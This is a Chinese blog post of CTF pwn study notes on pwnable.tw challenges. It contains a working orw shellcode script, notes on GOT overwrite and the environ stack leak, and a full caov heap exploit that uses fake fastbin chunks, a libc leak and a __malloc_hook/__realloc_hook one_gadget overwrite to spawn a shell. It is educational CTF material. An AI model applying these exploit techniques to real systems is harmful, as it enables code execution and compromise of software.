学习笔记lalala

最新推荐文章于 2024-03-30 15:58:25 发布
最新推荐文章于 2024-03-30 15:58:25 发布
阅读量275 收藏
点赞数 4
分类专栏: ctf pwn 文章标签: pwn 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56780239/article/details/121617797
版权
ctf 同时被 2 个专栏收录
1 篇文章 0 订阅
订阅专栏
pwn
1 篇文章 0 订阅
订阅专栏

orw:发现写shellcode的新大陆

from pwn import *
p = remote('chall.pwnable.tw',10001)
#p = process('./orw')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)

shellcode = ""
shellcode += shellcraft.i386.pushstr("/home/orw/flag")
shellcode += shellcraft.i386.linux.syscall("SYS_open", 'esp',0)
shellcode += shellcraft.i386.linux.syscall("SYS_read", 'eax', 'esp', 0x30)
shellcode += shellcraft.i386.linux.syscall("SYS_write", 1, 'esp', 0x30)

payload = asm(shellcode)
p.recvuntil('Give my your shellcode:')
p.send(payload)
p.interactive()

cal:scanf()的bug

使用scanf("")读取数字时,当输入为 ‘+’ 或者 ‘-’,读取数据,不会改变栈空间中的数据,但是会跳过,不再将 '-' , '+' 放入缓存区,而输入其他非法字符(如)时,由于不能识别读取,最一直储存在缓存区,导致始终无法向后读取,导致无效读入

hacknote:all_in_one 获得各种版本的libc,patchelf 强制修改elf文件的libc与ld,gdb加载符号表

使用all_in_one 下载libc后,会自动下载.debug 文件,并放在相应的文件夹下,

patchelf 首先修改文件的ld.so,patchelf --set-interpreter ....../(目标ld.**.so)filename

然后修改 libc加载,lld 查看文件原来的加载libc.so的搜索路径 ,

patchelf --replace-needed (原路径) (目标路径/libc.**.so)filename

malloc申请到内存后,返回的不是chunk的首地址,前8字节用于储存chunk信息,chunk+8开始是用户数据,free后加入fastbins,连续申请的两块内存不会合并

applestore:

如何获取栈地址:libc中保留的全局变量environ ,获得libc基址后,利用LibcSearcher工具,environ = libc_base +libc.dump('__environ'),environ保留了一个栈中的地址,gdb调试可以看到其与我们可以利用地址的偏移量。

修改GOT表项,将atoi改为system,read读取时,输入system的地址(这是才完成修改),因为函数用栈传参,将system的参数binsh也写在system的后面,

caov:

        c++ ,x64程序,glibc2.23

        源码C++就是个坑,

Data operator=(const Data &rhs)
        {
            key = new char[strlen(rhs.key)+1];
            strcpy(key, rhs.key);
            value = rhs.value;
            change_count = rhs.change_count;
            year  = rhs.year;
            month = rhs.month;
            day   = rhs.day;
            hour  = rhs.hour;
            min   = rhs.min;
            sec   = rhs.sec;
        }



//正确的写法是
Data operator = (const Data &rhs)
        {
            Data ret;        //use ret to copy rhs
            ··· ···
            return ret;
        }

问题在于源码中类的构造函数定义 :重载 = 时没有返回引用,存在一个临时对象,通过IDA分析出这个类指针没有初始化,而且存在于栈中,delete_data((__int64)v4)所在函数调用前,调用一个读入字符串的函数,而且是将数据读入到栈中,在转存到bss中。那么通过查看栈结构发现,只要在读入字符串时,数据超过0x60字节,就可以覆盖到v4,实现任意地址的free。

        于是乎,就可以利用fastbins attack,实现任意地址写,首先控制DATA,通过伪造一个chunk,替换掉DATA所保存的chunk指针,可以实现任意地址读,泄露出libc的基地址。这里实际操作的时候有几个注意点:1,伪造一个吨的同时,要伪造他的下一个fake chunk 的size,绕过free的检查,2,将任意地址写入fastbins的时候,如果该地址所对应的“chunk”的size不合法就无法申请并完成写入数据。就比如DATA,这里改写DATA,利用了DATA前面的内容,

利用stderr伪造一个chunk,大小为0x7f

 这样我们将DATA控制为NAME所在的位置,控制好name,就可以实现key的输出

 接下来同样的手法修改malloc_hook:

劫持malloc_hook:

malloc:
if ( _malloc_hook )
    return _malloc_hook(a1, retaddr);

执行malloc时,如果_malloc_hook不为空就执行其目标函数,

同样的也有realloc

if ( _realloc_hook )
    return _realloc_hook(a1, a2, retaddr);

一般来说,通过错位覆盖改写__malloc_hook为后门函数的地址或者one_gadget就可以,但是one_gadget的使用需要满足一些条件,而往往这些条件难以满足,尤其是寄存器的值,这个时候往往要选择栈的一些条件,但是通常不可行。

此时就需要realloc调栈大法。

.text:0000000000083B10 realloc         proc near               ; CODE XREF: _realloc↑j
.text:0000000000083B10                                         ; DATA XREF: LOAD:0000000000006BA0↑o ...
.text:0000000000083B10
.text:0000000000083B10 var_60          = qword ptr -60h
.text:0000000000083B10 var_58          = byte ptr -58h
.text:0000000000083B10 var_48          = byte ptr -48h
.text:0000000000083B10
.text:0000000000083B10 ; __unwind {
.text:0000000000083B10                 push    r15             ; Alternative name is '__libc_realloc'
.text:0000000000083B12                 push    r14
.text:0000000000083B14                 push    r13
.text:0000000000083B16                 push    r12
.text:0000000000083B18                 mov     r13, rsi
.text:0000000000083B1B                 push    rbp
.text:0000000000083B1C                 push    rbx
.text:0000000000083B1D                 mov     rbx, rdi
.text:0000000000083B20                 sub     rsp, 38h
.text:0000000000083B24 ; 25:   if ( _realloc_hook )
.text:0000000000083B24                 mov     rax, cs:__realloc_hook_ptr
.text:0000000000083B2B                 mov     rax, [rax]
.text:0000000000083B2E                 test    rax, rax
.text:0000000000083B31                 jnz     loc_83D38

进行了6次入栈操作,可以对站的结构进行调整,然后覆盖__realloc_hook为后门函数或者one_gadget地址(执行流程malloc--->__malloc_hook(realloc +X )--->__realloc_hook(shell))X是控制入栈顺序而选择的偏移量,详见反汇编代码。为了确保可以满足one_gadget的条件,通过gdb调试查看栈的情况,其实可以先将one_gadget设置为0xcafebabedeadbeef,这是gdb必挂的一个地址,此时就可以查看站的情况,对realloc的地址进行调整。

from pwn import *
#context.log_level = 'debug'


i =0
if i==0:
	r=process('./caov')
	elf = ELF('./caov')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	one_gadget = 0x4527a
	malloc_hook = 0x3c4b10
	realloc_hook =0x7f2e9ff42b10-0x7f2e9fb7e000
else :
	r=remote("chall.pwnable.tw", 10306)
	elf = ELF('./caov')
	libc = ELF('./libc_64.so.6')
	malloc_hook = 0x3c3b10
	realloc_hook = 0x3c3b08
	one_gadget = 0x45260
DATA = 0x6032A0
NAME = 0x6032C0

read_got = elf.got['read']
printf_got = elf.got['printf']


print("printf_got = ",hex(printf_got))
print("sysmbols = ",hex(libc.symbols['printf']))

def setname(name):
	r.recv()
	r.sendline(name)

def init(name,key,value):
	setname(name)

	r.sendlineafter("key: ",key)
	r.recv()
	r.sendline(str(value))

def show():
	r.sendline('1')

def edit(name,length,key):
	r.recv()	
	r.sendline('2')
	setname(name)
	r.sendlineafter("length: ",str(length))
	r.sendline(key)
	r.recv()
	r.sendline("9")

fake1 = p64(0) + p64(0x71)+p64(0)+p64(0) +p64(0x71)
fake1+= p64(0)*8  + p64(0)*2+p64(0x21) + p64(0)*2 +'\x21\x00'

init(fake1,'a'*0x20,9)

#gdb.attach(r,'b *0x00040159F')
fake2 = p64(0) + p64(0x71)+p64(DATA-0x23+8) +p64(0)+p64(0x71)
fake2+= p64(0)*7+p64(NAME+0x10)
edit(fake2,9,'a'*6)

fake3 = p64(0) + p64(0x71)+p64(DATA-0x23+8) +p64(0)+p64(0x71)
fake3+= p64(0)*7+p64(0)
edit(fake3,0x60,'a'*0x10)

fake4 = p64(0)*3 +p64(0x41)+p64(printf_got) +p64(9) 
fake4 +=p64(3) +p64(0x2000007e6)+p64(0x0000001400000014)+p64(0x000000280000002f)
key = p64(0)+p64((NAME+0x20)*0x1000000)
edit(fake4,0x60,key)

show()

r.recvuntil("data :\nKey: ")
printf_addr=u64(r.recv(6).ljust(8,'\x00'))
print("addr :",hex(printf_addr))
print("addr in libc :",hex(libc.symbols["printf"]))
lib_base = printf_addr - libc.symbols["printf"]
malloc_hook +=lib_base
realloc_hook += lib_base
realloc = lib_base + libc.symbols["realloc"]
onegadget = one_gadget + lib_base


#onegadget = 0xcafebabedeadbeef


print("malloc_hook :",hex(malloc_hook),"  -----(-0x23)---->",hex(malloc_hook-0x23))
print("one_gadget :",hex(onegadget))


#gdb.attach(r,'b realloc')
fake5 =p64(0) +p64(0x71)+p64(malloc_hook-0x23)+p64(0x41)+p64(NAME+0x10) +p64(9)
fake5 +=p64(3) +p64(0x2000007e6)+p64(0x0000001400000014)+p64(0x000000280000002f)
fake5 +=p64(0)*2+p64(NAME+0x10)
key = p64(malloc_hook-0x23) +p64(0x41)
print("delete the fake")
edit(fake5,0x20,key)


fake6 = p64(0) +p64(0x71)+p64(malloc_hook-0x23)+p64(0x41)+p64(NAME+0x10) +p64(9)
fake6+= p64(3) +p64(0x2000007e6)+p64(0x0000001400000014)+p64(0x000000280000002f)
fake6+=p64(0)*3
print("get the fake ,provide the aim")
edit(fake6,0x60,'\x00')


#gdb.attach(r,'b malloc')

pad1 = lib_base+3945056
pad2 = lib_base+548512
pad3 = lib_base+547440
offset = 0x7f0000000000

key = p64(0)+'\x00'*3
key +=p64(onegadget)+p64(realloc)
#key +=p64(0)+p64(onegadget)
print("edit the aim")
edit('\x00',0x20,"cccc")
#gdb.attach(r,'b realloc')
edit(fake6,0x60,key)

#gdb.attach(r)
#r.recv()


r.interactive()

dreamcat_
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在栈和堆分配内存
心想事成
10-26 452
在栈和堆分配内存LUNICODE_STRING Src ; LUNICODE_STRING *Dst1 = new LUNICODE_STRING(); LUNICODE_STRING Dst2; RtlInitLUnicodeString(&Dst2, L""); RtlInitLUnicodeString(&Src, L"microsoft-windows-ie-windows-internet
java学习笔记总结
04-02
这份“java学习笔记总结”涵盖了作者在深入学习Java过程中积累的知识点和实践经验,旨在帮助读者理解和掌握Java的核心概念。 首先,Java的基础部分包括语法、变量、数据类型、运算符和流程控制。Java支持八种基本...
[BMZCTF-pwn] 25-pwn3
weixin_52640415的博客
02-16 130
第三题的难度就突然上来了。程序先是个菜单,有好向项都没用;smsg先调用clear_string然后问是否发送,输入Y就退出循环 int smsg() { char v1; // [rsp+7h] [rbp-59h] BYREF void *buf; // [rsp+8h] [rbp-58h] BYREF char v3; // [rsp+10h] [rbp-50h] BYREF int v4; // [rsp+5Ch] [rbp-4h] v4 = 0; v1 = 78;
IDA Pro *(_QWORD *)和*(_BYTE *)表达式解释
最新发布
Jingged的博客
03-30 1023
这种类型转换和解引用的组合在反汇编和逆向工程中非常常见,因为原始源代码中的数据类型和变量名在编译过程中通常会丢失,而分析人员需要依赖工具来理解和解释机器代码。作为一个整体,通常用于将一个地址(或其他整数)转换为一个指向64位无符号整数的指针,并获取该地址上的值。时,这通常意味着某个地址或值被转换为一个指向字节的指针,并且随后会解引用该指针以获取该地址上的字节值。允许你在不知道原始数据类型的情况下,以特定的方式(这里是64位无符号整数)解释和访问内存中的数据。类似,但这里涉及的是1字节(8位)的数据。
[BUUCTF-pwn] wdb_2018_1st_EasyCoin
weixin_52640415的博客
01-20 1922
原版的exp是这网鼎杯-EasyCoin | e3pem's Blog 看了半天好不容易弄明白。 漏洞点有两个,第1个比较容易,登录后输入4个字符不在菜单里的就直接printf,不过就4位也干不了嘛。把0-9都试一遍找到3和9分别是libc.write+0x10和heap_base+0x10也算是有用 default: printf("[-] Unknown Command: "); printf(buf); ..
linux】程序找不到动态库.so的解决办法|查看.so动态库信息|.so动态库加载顺序
热门推荐
bandaoyu的note
01-26 1万+
方法一:添加环境变量 子招数1. 添加当前用户当前终端的环境变量-临时 export LD_LIBRARY_PATH=/home/czd/... #.so file path 子招数2. 添加当前用户的环境变量 修改~/.bashrc文件,在其末尾,添加环境变量 vim ~/.bashrc export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/czd/... #.so file path 使其生效, source ~/.bashrc 如不能生
学习笔记学习笔记学习笔记
01-29
学习笔记学习笔记学习笔记
Tensorflow2学习笔记
06-08
北大 曹健老师课程的学习笔记上传供个人留存使用
Python进阶学习笔记
06-10
Python进阶学习笔记
PHP个人学习笔记
03-13
PHP个人学习笔记
patchelf:一个用于修改ELF可执行文件的动态链接器和RPATH的小实用程序
04-30
PatchELF是用于修改现有ELF可执行文件和库的简单实用程序。 特别是,它可以执行以下操作: 更改可执行文件的动态加载程序(“ ELF解释程序”): $ patchelf --set-interpreter /lib/my-ld-linux.so.2 my-program 更改可执行文件和库的RPATH : $ patchelf --set-rpath /opt/my-libs/lib:/other-libs my-program 缩小可执行文件和库的RPATH : $ patchelf --shrink-rpath my-program 这将从RPATH删除所有不包含由可执行文件或库的DT_NEEDED字段引用的库的目录。 例如,如果可执行文件引用一个库libfoo.so ,并且具有RPATH /lib:/usr/lib:/foo/lib ,而libfoo.so只能在/
数据宽度-Bit、Byte、Word、Dword、Qword
hmyqwe的博客
11-19 4641
位 Bit: 是计算机内部数据储存的最小单位 字节 Byte: 八个比特 (Bit) 称为一个字节,是计算机中数据处理的基本单位 字 Word: 两个字节称为一个字 双字 Dword: 两个字称为一个双字 四字 Qword: 两个双字称为一个四字 ...
IDA中的_OWORD
msInfoSec的博客
04-15 6451
IDA中的_OWORD 一个有意思的巧合 _OWORD的含义 总结 阅读之前注意: 本文阅读建议用时:5min 本文阅读结构如下表: 项目 下属项目 测试用例数量 一个有意思的巧合 无 0 _OWORD的含义 无 1 总结 无 0 一个有意思的巧合 正如我们所知道的那样,在英文中的月份缩写中,OCT代表着十月(October),而DEC代表着十二月(Decembe...
jsf取js变量_jsf-将参数从JavaScript传递到p:remote命令
weixin_36289742的博客
01-12 128
是的,有可能。 具体操作取决于PrimeFaces版本。 您可以在PrimeFaces用户指南中看到它。 在PrimeFaces 3.3版之前,语法如下(从3.2用户指南中复制):3.80远程命令...传递参数远程命令可以通过以下方式发送动态参数;Integer通常可以在支持bean中使用它。 例如。 在请求范围内的bean中:@ManagedProperty("#{param.param1}")...
linux 修改 elf 文件的dynamic linker 和 rpath
weixin_34072159的博客
09-14 971
linux 修改 elf 文件的dynamic linker 和 rpath https://nixos.org/patchelf.html 下载地址 https://nixos.org/releases/patchelf/patchelf-0.9/patchelf-0.9.tar.gz https://nixos.org/releases/patchelf/patchelf-0.9/patche...
搭建Ubuntu16.04系统下Pwn环境的几个疑难问题
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-10 7728
  之前搭建了一下 Ubuntu 系统下的 Pwn 环境,但是搭建过程中遇到很多问题,有些顺手可以解决。还有一部分花费了很长时间,在此记录。 1. 使用通用exp执行不能getshell   前情提要:   我本来是有一套 Kali 的做题环境的,执行 exp 什么的都正常,后来重新搭了一套 Ubuntu20.04 的环境。工具什么的都可以正常安装,但是发现之前能用的 exp 都执行不了了,执行起来会报错并且不能getshell了。   以攻防世界Pwn题目“level0”为例,EXP如下: from pw
PWN 更换目标程序libc
yongbaoii的博客
12-29 4768
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
JavaEE全栈学习笔记
"这是一份综合性的JavaEE学习笔记,由作者续祥整理,涵盖了从基础的Java知识到JavaEE的深入内容,还包括了Unix、Core Java、Java 5.0(Tiger)的新特性、XML以及Oracle数据库的相关学习资料。笔记详细介绍了各个主题的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值